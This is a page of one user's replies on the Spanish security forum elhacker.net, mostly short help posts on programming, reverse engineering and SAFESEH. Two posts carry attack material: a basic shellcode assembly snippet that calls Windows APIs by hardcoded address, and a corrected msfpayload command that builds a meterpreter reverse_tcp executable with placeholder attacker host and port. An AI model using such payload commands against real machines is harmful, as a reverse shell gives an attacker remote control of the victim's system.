elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 [393] 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 ... 620
3921  Programación / Programación Visual Basic / Re: montar sus strings como quieras en: 26 Julio 2014, 23:24 pm
Perdón por la consulta, pero, es un generador de strings de largo arbitrario random, no?
3922  Programación / Ingeniería Inversa / Re: [AYUDA] Desempaquetar Dongle con OllyDBG en: 25 Julio 2014, 01:22 am
Hola!

Aqui encontraras mucha info sobre el desempacado de dongles.

Saludos!
3923  Seguridad Informática / Análisis y Diseño de Malware / Re: problema en la creacion de shellcode basica en: 23 Julio 2014, 22:11 pm
Otra cosa que puedes hacer (para no usar el deltaoffset) es:

Código
  1. .386
  2. .model flat,stdcall
  3. option casemap:none
  4. .code
  5.  
  6. inicio:    
  7. call delta        ;provoca el PUSH de la direccion del string que sigue
  8. db "User32.dll",0
  9. delta:
  10. mov eax,77272864h ;direccion de loadlibraryA varia
  11. call eax    
  12. push 0  
  13. push 0    
  14. push 0    
  15. push 0        
  16. mov eax,778eea71h ;//direccion de MessageBoxA    varia
  17. call eax
  18. retn
  19. end inicio
  20.  

Para solucionar el problema de las DLLs, sólo necesitas LoadLibrary y GetProcAddress. Luego, usando el método que haz puesto o el que te dejo aquí; haces LoadLibrary y GetProcAddress y ya tienes la direccion real de la API.

Hay múltiples ejemplos de llamadas a API con código pic en internet.

Saludos!
3924  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Pie del foro en: 23 Julio 2014, 01:06 am
La veo salir, pero cuando no estoy logueado...
3925  Seguridad Informática / Bugs y Exploits / Re: ¿Dónde apunta el SEH handler con SAFESEH? en: 21 Julio 2014, 23:15 pm
Hasta donde entiendo, cuando compilas con SAFESEH, el compilador crea una tabla con todos los SEH chains que has declarado en tu codigo.

Luego, si ocurre una excepcion que tenga SEH, el SO comprobara que la direccion del SEH Handler al momento de la excepcion, este en la tabla creada. Si no esta, entonces no ejecutara el SEH handler.

Esto previene los exploits que sobreescriben el SEH handler.

Saludos!

EDIT: La tabla que te menciono, esta en tu exe.
3926  Foros Generales / Foro Libre / Re: nuevo miembrp en: 21 Julio 2014, 07:34 am
Hola!

Aqui tienes el post donde puedes presentarte.

Saludos! (y bienvenido al foro!)
3927  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:54 pm
Creo qué no me has entendido amigo

Lo que quiero es generar ese payload desde la consola de metasploit que tengo instalado en windows,saludos

El comando del link anterior, te permite crear un ejecutable, desde la consola, ya sea en linux o windows.

La explicacion del articulo es muy simple...

Saludos!
3928  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:32 pm
Fijate esto.

Saludos!
3929  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:20 pm
Tu codigo:

Código:
msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX > /ejemplo/lol.exe

como creo que deberia ser:

Código:
msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX x > /ejemplo/lol.exe

Saludos!
3930  Programación / Programación Visual Basic / Re: Ayuda con resolución de formulario en VB 6.0 en: 17 Julio 2014, 15:55 pm
Hola!

Esto ya se ha respondido antes. Probaste usando el buscador del foro?

Saludos!
Páginas: 1 ... 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 [393] 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 ... 620
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines